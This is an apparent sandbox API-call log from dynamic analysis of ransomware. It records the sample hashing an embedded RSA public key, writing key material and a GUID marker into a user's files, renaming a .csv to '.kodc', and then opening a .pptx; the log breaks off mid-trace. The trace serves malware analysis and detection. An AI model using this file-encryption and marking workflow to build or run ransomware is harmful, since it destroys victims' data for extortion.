KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.197] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.198] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.198] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.198] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.198] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.198] GetLastError () returned 0x0 [0098.198] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.198] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.198] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.198] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.198] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe7f0) returned 0x9ba4d90 [0098.199] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6048 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.199] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8f8 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a8e0 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.200] GetCurrentThreadId () returned 0x42c [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e668 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.201] GetCurrentThreadId () returned 0x42c [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a910 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.203] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe7e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.203] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.203] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.203] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.203] CloseHandle (hObject=0x5cc) returned 1 [0098.205] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_UXE8e7CHr2aXm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_uxe8e7chr2axm.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_UXE8e7CHr2aXm.csv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_uxe8e7chr2axm.csv.kodc")) returned 1 [0098.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.206] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.207] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d583e10, ftCreationTime.dwHighDateTime=0x1d55e4d, ftLastAccessTime.dwLowDateTime=0x26fb5e20, ftLastAccessTime.dwHighDateTime=0x1d57ccf, ftLastWriteTime.dwLowDateTime=0x26fb5e20, ftLastWriteTime.dwHighDateTime=0x1d57ccf, nFileSizeHigh=0x0, nFileSizeLow=0x3b49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D68-UMcj xt ZPs.pptx", cAlternateFileName="D68-UM~1.PPT")) returned 1 [0098.207] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D68-UMcj xt ZPs.pptx") returned=".pptx" [0098.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D68-UMcj xt ZPs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d68-umcj xt zps.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.207] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=15177) returned 1 [0098.207] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.211] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3b23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.211] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.212] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.212] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x3b49, lpOverlapped=0x0) returned 1 [0098.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.212] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.213] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.213] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.213] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.213] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.213] GetLastError () returned 0x0 [0098.213] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.213] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.214] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.214] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.214] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3b50) returned 0x9ba4d90 [0098.214] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0098.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x69d4a8 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.215] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) 